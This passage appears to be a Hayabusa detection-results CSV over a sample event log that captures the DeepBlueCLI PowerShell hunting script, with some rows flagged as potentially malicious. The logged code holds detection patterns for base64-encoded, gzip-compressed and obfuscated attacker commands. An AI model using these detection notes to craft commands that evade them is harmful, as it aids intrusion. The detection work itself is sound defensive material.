2017-08-31 03:58:22.516 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:58:22.516 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:58:22.517 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:58:22.518 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:58:28.692 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:59:30.619 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:59:31.969 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:59:31.974 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:59:31.974 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:59:31.974 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command 
Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if 
(Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" 
{$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'""",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:59:31.974 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
